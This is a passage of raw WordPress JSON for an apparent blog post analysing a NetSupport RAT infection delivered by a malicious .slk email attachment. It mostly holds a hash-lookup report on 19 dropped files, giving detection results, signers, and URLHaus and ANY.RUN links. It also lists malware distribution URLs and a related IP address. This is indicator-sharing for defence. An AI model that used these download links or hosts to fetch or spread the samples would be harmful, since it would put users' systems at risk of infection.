&#8211;<\/p>\n<p>2 \/ 19 &gt; Unknown<br \/>\nHASH: 34a4871259f22fea2170acee8d7053886d2802663957cac206d6bba6be54e93d COMMENT: msiwrapper.ini<br \/>\nRESULT: &#8211; \/ &#8211;<\/p>\n<p>3 \/ 19 &gt; Unknown<br \/>\nHASH: b96e85f9862ef4b4eee656a4fa9dffd577ab7f16370e264de43b5914853b8e0b COMMENT: MSIa96e0.LOG<br \/>\nRESULT: &#8211; \/ &#8211;<\/p>\n<p>4 \/ 19 &gt; Suspicious<br \/>\nHASH: 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 COMMENT: PCICL32.DLL<br \/>\nTYPE: Win32 DLL SIZE: 3.56 MB FILENAMES: pcicl32.dll, PCICL32.DLL, pcicl32.dll, pcicl32, PCICL32.xyz<br \/>\nSIGNER: NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign<br \/>\nFIRST: 2017-10-26 19:42:05 LAST: 2020-04-29 01:03:22 SUBMISSIONS: 20 REPUTATION: 0<br \/>\nCOMMENTS: 2 USERS: tines_bot, zbetcheckin TAGS: PEDLL SIGNED OVERLAY<br \/>\nRESULT: 2 \/ 71<br \/>\n[!] Sample on URLHaus URL: <a href=\"http:\/\/urlhaus-api.abuse.ch\/v1\/download\/63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8\/\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/urlhaus-api.abuse.ch\/v1\/download\/63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8\/<\/a><br \/>\n[!] URLHaus info TYPE: exe FIRST_SEEN: 2019-09-22 19:44:12 LAST_SEEN: 2019-09-27 18:51:36 URL_COUNT: 1<br \/>\n[!] URLHaus STATUS: offline URL: http:\/\/xyxyxoooo.com\/KON998\/PCICL32.DLL<br \/>\n[!] Sample on ANY.RUN URL: <a href=\"http:\/\/any.run\/report\/63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/any.run\/report\/63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8<\/a><\/p>\n<p>5 \/ 19 &gt; Suspicious<br \/>\nHASH: edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 COMMENT: HTCTL32.DLL<br \/>\nTYPE: Win32 DLL SIZE: 320.37 KB FILENAMES: htctl32.dll, HTCTL32.DLL, htctl32.dll, htctl32, HTCTL32.xzi<br \/>\nSIGNER: NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign<br \/>\nFIRST: 2016-06-14 19:51:03 LAST: 2020-05-11 22:24:37 SUBMISSIONS: 17 REPUTATION: 0<br \/>\nCOMMENTS: 1 USERS: tines_bot TAGS: PEDLL SIGNED OVERLAY<br \/>\nRESULT: 1 \/ 71<br \/>\n[!] Signer &#8211; appeared 2 times in this batch b&#8217;NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign&#8217;<br \/>\n[!] Sample on URLHaus URL: <a href=\"http:\/\/urlhaus-api.abuse.ch\/v1\/download\/edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796\/\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/urlhaus-api.abuse.ch\/v1\/download\/edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796\/<\/a><br \/>\n[!] URLHaus info TYPE: exe FIRST_SEEN: 2019-09-22 19:44:04 LAST_SEEN: 2019-09-27 18:51:25 URL_COUNT: 1<br \/>\n[!] URLHaus STATUS: offline URL: http:\/\/xyxyxoooo.com\/KON998\/HTCTL32.DLL<br \/>\n[!] Sample on ANY.RUN URL: <a href=\"http:\/\/any.run\/report\/edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/any.run\/report\/edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796<\/a><\/p>\n<p>6 \/ 19 &gt; Clean<br \/>\nHASH: 60fe386112ad51f40a1ee9e1b15eca802ced174d7055341c491dee06780b3f92 COMMENT: NSM.ini<br \/>\nTYPE: unknown SIZE: 6.31 KB FILENAMES: NSM.ini, NSM.ini, nsm.ini<br \/>\nFIRST: 2017-12-28 11:39:44 LAST: 2020-04-29 01:02:57 SUBMISSIONS: 7 REPUTATION: 0<br \/>\nCOMMENTS: 1 USERS: tines_bot TAGS:<br \/>\nRESULT: 0 \/ 59<br \/>\n[!] Sample on ANY.RUN URL: <a href=\"http:\/\/any.run\/report\/60fe386112ad51f40a1ee9e1b15eca802ced174d7055341c491dee06780b3f92\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/any.run\/report\/60fe386112ad51f40a1ee9e1b15eca802ced174d7055341c491dee06780b3f92<\/a><\/p>\n<p>7 \/ 19 &gt; Suspicious<br \/>\nHASH: 8ad9c598c1fde52dd2bfced5f953ca0d013b0c65feb5ded73585cfc420c95a95 COMMENT: remcmdstub.exe<br \/>\nVIRUS: McAfee: PUP-RemoteAdmin.a<br \/>\nTYPE: Win32 EXE SIZE: 62.37 KB FILENAMES: remcmdstub.exe, remcmdstub.exe, remcmdstub<br \/>\nSIGNER: NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign<br \/>\nFIRST: 2018-04-04 11:52:38 LAST: 2020-05-12 08:31:34 SUBMISSIONS: 14 REPUTATION: 0<br \/>\nCOMMENTS: 1 USERS: tines_bot TAGS: PEEXE SIGNED OVERLAY<br \/>\nRESULT: 3 \/ 72<br \/>\n[!] Signer &#8211; appeared 3 times in this batch b&#8217;NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign&#8217;<br \/>\n[!] Sample on ANY.RUN URL: <a href=\"http:\/\/any.run\/report\/8ad9c598c1fde52dd2bfced5f953ca0d013b0c65feb5ded73585cfc420c95a95\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/any.run\/report\/8ad9c598c1fde52dd2bfced5f953ca0d013b0c65feb5ded73585cfc420c95a95<\/a><\/p>\n<p>8 \/ 19 &gt; Malicious<br \/>\nHASH: 49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3 COMMENT: dwm.exe<br \/>\nVIRUS: Microsoft: PUA:Win32\/Presenoker \/ Kaspersky: not-a-virus:RemoteAdmin.Win32.NetSup.i \/ McAfee: PUP-RemoteAdmin.a<br \/>\nTYPE: Win32 EXE SIZE: 103.37 KB FILENAMES: client32.exe, client32, client32.exe, dwm.exe, presentationhost.exe, fonthost.exe, client32.xzi<br \/>\nSIGNER: NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign<br \/>\nFIRST: 2016-07-12 06:00:07 LAST: 2020-05-28 07:37:25 SUBMISSIONS: 44 REPUTATION: -19<br \/>\nCOMMENTS: 5 USERS: tines_bot, joesecurity, joesecurity, zbetcheckin, zbetcheckin TAGS: INVALID-SIGNATURE PEEXE SIGNED OVERLAY<br \/>\nRESULT: 12 \/ 71<br \/>\n[!] Signer &#8211; appeared 4 times in this batch b&#8217;NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign&#8217;<br \/>\n[!] Sample on URLHaus URL: <a href=\"http:\/\/urlhaus-api.abuse.ch\/v1\/download\/49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3\/\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/urlhaus-api.abuse.ch\/v1\/download\/49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3\/<\/a><br \/>\n[!] URLHaus info TYPE: exe FIRST_SEEN: 2019-09-22 19:44:20 LAST_SEEN: 2020-01-28 16:46:06 URL_COUNT: 3<br \/>\n[!] URLHaus STATUS: offline URL: http:\/\/aisioy.xyz\/11\/client32.exe<br \/>\n[!] URLHaus STATUS: offline URL: http:\/\/xyxyxoooo.com\/K01\/client32.exe<br \/>\n[!] URLHaus STATUS: offline URL: http:\/\/xyxyxoooo.com\/KON998\/client32.exe<br \/>\n[!] Sample on ANY.RUN URL: <a href=\"http:\/\/any.run\/report\/49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/any.run\/report\/49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3<\/a><\/p>\n<p>9 \/ 19 &gt; Clean<br \/>\nHASH: 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 COMMENT: msvcr100.dll<br \/>\nTYPE: Win32 DLL SIZE: 755.83 KB FILENAMES: msvcr100_clr0400.dll, msvcr100.dll, msvcr100_clr0400.dll, MSVCR100.dll<br \/>\nSIGNER: Microsoft Corporation; Microsoft Code Signing PCA; Microsoft Root Authority<br \/>\nFIRST: 2011-08-10 17:05:25 LAST: 2020-05-28 18:54:33 SUBMISSIONS: 12824 REPUTATION: 247<br \/>\nCOMMENTS: 10 USERS: tines_bot, joesecurity, HybridAnalysis, HybridAnalysis, HybridAnalysis, HybridAnalysis, ZXDemon, nielsgroeneveld, threatlead, Bernardo.Quintero TAGS: OVERLAY SIGNED TRUSTED VIA-TOR INVALID-SIGNATURE PEDLL<br \/>\nRESULT: 0 \/ 72<br \/>\n[!] Sample on URLHaus URL: <a href=\"http:\/\/urlhaus-api.abuse.ch\/v1\/download\/8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18\/\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/urlhaus-api.abuse.ch\/v1\/download\/8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18\/<\/a><br \/>\n[!] URLHaus info TYPE: exe FIRST_SEEN: 2019-09-22 19:44:17 LAST_SEEN: 2019-09-27 18:51:26 URL_COUNT: 1<br \/>\n[!] URLHaus STATUS: offline URL: http:\/\/xyxyxoooo.com\/KON998\/msvcr100.dll<br \/>\n[!] Sample on ANY.RUN URL: <a href=\"http:\/\/any.run\/report\/8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/any.run\/report\/8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18<\/a><\/p>\n<p>10 \/ 19 &gt; Suspicious<br \/>\nHASH: 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 COMMENT: pcicapi.dll<br \/>\nTYPE: Win32 DLL SIZE: 32.37 KB FILENAMES: pcicapi.dll, pcicapi.dll, pcicapi, pcicapi.xzi<br \/>\nSIGNER: NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign<br \/>\nFIRST: 2016-06-14 19:50:11 LAST: 2020-04-30 09:03:13 SUBMISSIONS: 18 REPUTATION: 0<br \/>\nCOMMENTS: 1 USERS: tines_bot TAGS: PEDLL SIGNED OVERLAY<br \/>\nRESULT: 1 \/ 70<br \/>\n[!] Signer &#8211; appeared 5 times in this batch b&#8217;NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign&#8217;<br \/>\n[!] Sample on URLHaus URL: <a href=\"http:\/\/urlhaus-api.abuse.ch\/v1\/download\/9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917\/\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/urlhaus-api.abuse.ch\/v1\/download\/9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917\/<\/a><br \/>\n[!] URLHaus info TYPE: exe FIRST_SEEN: 2019-09-22 19:44:18 LAST_SEEN: 2019-09-27 18:51:25 URL_COUNT: 1<br \/>\n[!] URLHaus STATUS: offline URL: http:\/\/xyxyxoooo.com\/KON998\/pcicapi.dll<br \/>\n[!] Sample on ANY.RUN URL: <a href=\"http:\/\/any.run\/report\/9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/any.run\/report\/9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917<\/a><\/p>\n<p>11 \/ 19 &gt; Unknown<br \/>\nHASH: c6b8ab9afb68f49a188765fe6bf2a71d2bbc6a53b4cd2d6cd0521f5df5e762a2 COMMENT: 1.exe<br \/>\nRESULT: &#8211; \/ &#8211;<\/p>\n<p>12 \/ 19 &gt; Suspicious<br \/>\nHASH: 2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12 COMMENT: NSM.lic<br \/>\nVIRUS: ESET-NOD32: Win32\/RiskWare.RemoteAdmin.NetSupportManager.G<br \/>\nTYPE: Text SIZE: 257.0 B FILENAMES: NSM.lic, NSM.lic, NSM.LIC, nsm.lic, NSM.xyz<br \/>\nFIRST: 2019-08-16 19:05:10 LAST: 2020-04-23 03:48:02 SUBMISSIONS: 2 REPUTATION: 0<br \/>\nCOMMENTS: 1 USERS: tines_bot TAGS: TEXT<br \/>\nRESULT: 2 \/ 58<br \/>\n[!] Sample on ANY.RUN URL: <a href=\"http:\/\/any.run\/report\/2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/any.run\/report\/2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12<\/a><\/p>\n<p>13 \/ 19 &gt; Clean<br \/>\nHASH: d96856cd944a9f1587907cacef974c0248b7f4210f1689c1e6bcac5fed289368 COMMENT: nskbfltr.inf<br \/>\nTYPE: Text SIZE: 328.0 B FILENAMES: nskbfltr.inf, nskbfltr.inf, nskbfltr.xzi, nskbfltr.xyz<br \/>\nFIRST: 2016-03-23 18:23:26 LAST: 2020-04-23 04:09:20 SUBMISSIONS: 6 REPUTATION: 0<br \/>\nCOMMENTS: 1 USERS: tines_bot TAGS: TEXT<br \/>\nRESULT: 0 \/ 57<br \/>\n[!] Sample on ANY.RUN URL: <a href=\"http:\/\/any.run\/report\/d96856cd944a9f1587907cacef974c0248b7f4210f1689c1e6bcac5fed289368\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/any.run\/report\/d96856cd944a9f1587907cacef974c0248b7f4210f1689c1e6bcac5fed289368<\/a><\/p>\n<p>14 \/ 19 &gt; Unknown<br \/>\nHASH: 2add4e3f9acd88b53c97989b309bccdf35456c444d7b4436bd0b9b04f1d16cf4 COMMENT: installations.ps1<br \/>\nRESULT: &#8211; \/ &#8211;<\/p>\n<p>15 \/ 19 &gt; Suspicious<br \/>\nHASH: 053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae COMMENT: blowfish.dll<br \/>\nTYPE: Win32 DLL SIZE: 22.0 KB FILENAMES: blowfish.dll, blowfish.dll, qzojaagjazrin.dll, QZoJaagjazriN.dll, nLZQDl.dll, IVVdXtRTGXcOlhKois.dll, ivvdxtrtgxcolhkois.dll, YBpyzeWCZhYuiw.dll<br \/>\nFIRST: 2008-01-29 10:54:54 LAST: 2020-05-19 08:08:04 SUBMISSIONS: 359 REPUTATION: -25<br \/>\nCOMMENTS: 1 USERS: BugBopperGuy TAGS: PEDLL<br \/>\nRESULT: 1 \/ 71<br \/>\n[!] Sample on ANY.RUN URL: <a href=\"http:\/\/any.run\/report\/053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/any.run\/report\/053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae<\/a><\/p>\n<p>16 \/ 19 &gt; Unknown<br \/>\nHASH: 5cd1dd897ca53631351db99484b62dd7f35c4a3539298638f4cfea42880c7ec7 COMMENT: files.cab<br \/>\nRESULT: &#8211; \/ &#8211;<\/p>\n<p>17 \/ 19 &gt; Unknown<br \/>\nHASH: 9cf77e6862951486de61abe93ea66ceb21c807853480febb1cb0656970844be9 COMMENT: client32.ini<br \/>\nRESULT: &#8211; \/ &#8211;<\/p>\n<p>18 \/ 19 &gt; Unknown<br \/>\nHASH: 9f3cd0c5b9c3fd571e2da5b9feb9f05a7a969aeb77d3c54dfcc0d0226f3d5f9f COMMENT: RPens.bat<br \/>\nRESULT: &#8211; \/ &#8211;<br \/>\n[!] Sample on ANY.RUN URL: <a href=\"http:\/\/any.run\/report\/9f3cd0c5b9c3fd571e2da5b9feb9f05a7a969aeb77d3c54dfcc0d0226f3d5f9f\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/any.run\/report\/9f3cd0c5b9c3fd571e2da5b9feb9f05a7a969aeb77d3c54dfcc0d0226f3d5f9f<\/a><\/p>\n<p>19 \/ 19 &gt; Suspicious<br \/>\nHASH: 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a COMMENT: PCICHEK.DLL<br \/>\nTYPE: Win32 DLL SIZE: 18.37 KB FILENAMES: pcichek.dll, PCICHEK.DLL, pcichek.dll, pcichek, PCICHEK.xzi<br \/>\nSIGNER: NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign<br \/>\nFIRST: 2016-06-14 19:50:02 LAST: 2020-04-23 03:59:48 SUBMISSIONS: 22 REPUTATION: 0<br \/>\nCOMMENTS: 2 USERS: tines_bot, zbetcheckin TAGS: PEDLL SIGNED OVERLAY<br \/>\nRESULT: 1 \/ 70<br \/>\n[!] Signer &#8211; appeared 6 times in this batch b&#8217;NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign&#8217;<br \/>\n[!] Sample on URLHaus URL: <a href=\"http:\/\/urlhaus-api.abuse.ch\/v1\/download\/313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a\/\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/urlhaus-api.abuse.ch\/v1\/download\/313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a\/<\/a><br \/>\n[!] URLHaus info TYPE: exe FIRST_SEEN: 2019-09-22 19:44:07 LAST_SEEN: 2019-09-27 18:51:25 URL_COUNT: 1<br \/>\n[!] URLHaus STATUS: offline URL: http:\/\/xyxyxoooo.com\/KON998\/PCICHEK.DLL<br \/>\n[!] Sample on ANY.RUN URL: <a href=\"http:\/\/any.run\/report\/313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/any.run\/report\/313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Summary ======== Yesterday when reviewing the spam filters I found an email with a malicious attachment (.slk file) that setups the system to be infected with what looks to be a NetSupport RAT (based on the information found in the PCAP). I Checked the usual OSINT resources (ie: Hybrid Analysis, Malshare, MalwareBazaar, Anyrun, URLHaus, VT) for the hash of the attachment. Unfortunately there were no hits or results found. The initial link also had no hits yesterday either. The only hit from this malware was for the IP address 207.148.12.140 but that was in the forms of passive DNS results&#8230;.<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=1364\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[39,21],"class_list":["post-1364","post","type-post","status-publish","format-standard","hentry","category-packet-analysis","tag-netsupport","tag-rat"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1364","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1364"}],"version-history":[{"count":11,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1364\/revisions"}],"predecessor-version":[{"id":1604,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1364\/revisions\/1604"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1364"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1364"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1364"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}